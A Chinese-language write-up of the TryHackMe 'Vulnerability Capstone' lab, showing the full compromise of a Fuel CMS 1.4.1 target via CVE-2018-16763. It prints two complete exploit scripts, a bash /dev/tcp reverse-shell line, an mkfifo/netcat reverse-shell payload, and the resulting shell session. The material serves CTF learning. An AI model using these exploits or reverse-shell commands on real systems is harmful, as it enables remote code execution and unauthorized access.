THM：Vulnerability Capstone[WriteUP]

连接至THM服务器并启动靶机

靶机IP：10.10.91.158

分配IP：10.14.95.66

What is the name of the application running on the vulnerable machine?

What is the version number of this application?

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.91.158 -r 1-65535 --ulimit 5000

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -p22,80 -sCV 10.10.91.158

使用curl访问靶机80端口页面

curl -I http://10.10.91.158:80

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl -I http://10.10.91.158:80
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 06:55:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8

使用浏览器访问靶机80端口页面

What is the number of the CVE that allows an attacker to remotely execute code on this application?

使用searchsploit搜索该CMS

searchsploit Fuel

• 由输出可见，该CMS: Fuel1.4.1版本存在远程代码执行漏洞

将searchsploit中的EXP拷贝到当前目录下

searchsploit -m 47138.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 47138.py
  Exploit: fuel CMS 1.4.1 - Remote Code Execution (1)
      URL: https://www.exploit-db.com/exploits/47138
     Path: /usr/share/exploitdb/exploits/linux/webapps/47138.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/47138.py

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

查看该EXP代码

cat 47138.py

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
        xxxx = raw_input('cmd:')
        burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
        proxy = {"http":"http://127.0.0.1:8080"}
        r = requests.get(burp0_url, proxies=proxy)

        html = "<!DOCTYPE html>"
        htmlcharset = r.text.find(html)

        begin = r.text[0:20]
        dup = find_nth_overlapping(r.text,begin,2)

        print r.text[0:dup]

我尝试将代码进行修改直接反弹shell

import requests
import urllib

url = "http://10.10.91.158:80"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
        xxxx = 'bash -i >& /dev/tcp/10.14.95.66/1425 0>&1'
        burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"

        r = requests.get(burp0_url)

        html = "<!DOCTYPE html>"
        htmlcharset = r.text.find(html)

        begin = r.text[0:20]
        dup = find_nth_overlapping(r.text,begin,2)

        print r.text[0:dup]

经过尝试利用失败，尝试到Github寻找EXP

#!/usr/bin/python3

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
# 
# Poc Created by Ac1d (assassin) 



import requests
import sys
import urllib

from requests.sessions import extract_cookies_to_jar

class col:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    RESET = '\033[0m'
    BLACK = "\033[0;30m"
    RED = "\033[0;31m"
    GREEN = "\033[0;32m"
    BROWN = "\033[0;33m"
    BLUE = "\033[0;34m"
    PURPLE = "\033[0;35m"
    LIGHT_GRAY = "\033[0;37m"
    DARK_GRAY = "\033[1;30m"
    LIGHT_RED = "\033[1;31m"
    LIGHT_GREEN = "\033[1;32m"
    YELLOW = "\033[1;33m"
    LIGHT_BLUE = "\033[1;34m"
    LIGHT_PURPLE = "\033[1;35m"
    LIGHT_CYAN = "\033[1;36m"
    LIGHT_WHITE = "\033[1;37m"
    BOLD = "\033[1m"
    FAINT = "\033[2m"
    ITALIC = "\033[3m"
    UNDERLINE = "\033[4m"
    BLINK = "\033[5m"
    NEGATIVE = "\033[7m"
    CROSSED = "\033[9m"


def banner():
    banner = r"""
 ______         _ _____ ___  ___ _____ 
|  ___|        | /  __ \|  \/  |/  ___|
| |_ _   _  ___| | /  \/| .  . |\ `--. 
|  _| | | |/ _ \ | |    | |\/| | `--. \
| | | |_| |  __/ | \__/\| |  | |/\__/ /
\_|  \__,_|\___|_|\____/\_|  |_/\____/ 
Tested on 1.4                                       
"""
    banner += "Created by Ac1d"
    return col.LIGHT_BLUE + banner + col.RESET


def help():
    banner = col.LIGHT_WHITE + "\n\tMenu\n"
    banner += col.LIGHT_GREEN
    banner += "\nexit     -\tExit app"
    banner += "\nshell_me -\tGet a reverse shell (netcat) "
    banner += "\nhelp     -\tShow this help\n"+ col.RESET
    return banner
    


print(banner())
print(help())

#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27

if len(sys.argv) != 2:
    print("\nUsage: ./fuleCMS IPADDRESS")
    sys.exit(0)

IP=sys.argv[1]

def parsePage(page):
    try:            
        page = page.split("<h4>A PHP Error was encountered</h4>")[0]
        page = page.split("<div")[0]
        page = page[6:]
        return page
    except:
        return False

try:
        
    while True:
        cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)

        if cmd[0:4].lower() == "exit":
            print(col.RED + "Exiting..." + col.RESET)
            sys.exit(0)

        if cmd[0:8] == "shell_me":
            IP2, PORT = input(col.LIGHT_BLUE + "Enter IP:PORT $ " + col.RESET).split(":")
            nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
            cmd = nc
            print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
            
        if cmd[0:4] == "help":
            print(help())
            continue
        
        if not "/tmp/f;mkfifo" in cmd:
            print(col.LIGHT_GRAY + "Sending request." + col.RESET)
        cmd = urllib.parse.quote(cmd)
        r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
        if r.status_code == 200:
            page = parsePage(r.text)
            if page == "\n":
                print(col.RED + "No result" + col.RESET)
                continue
            print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)

except Exception as e:
    print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)

首先通过该脚本指定靶机IP

python fuelCMS.py 10.10.91.158

输入shell_me后，在本地侧通过nc开始监听

rlwrap -cAr nc -lvnp 1425

在脚本中输入本机分配IP地址以及监听端口后收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.14.95.66] from (UNKNOWN) [10.10.91.158] 38980
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

在靶机中进入到/home/ubuntu目录下查看flag

$ cd /home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{XXXXX_XXXX_XXXXXX}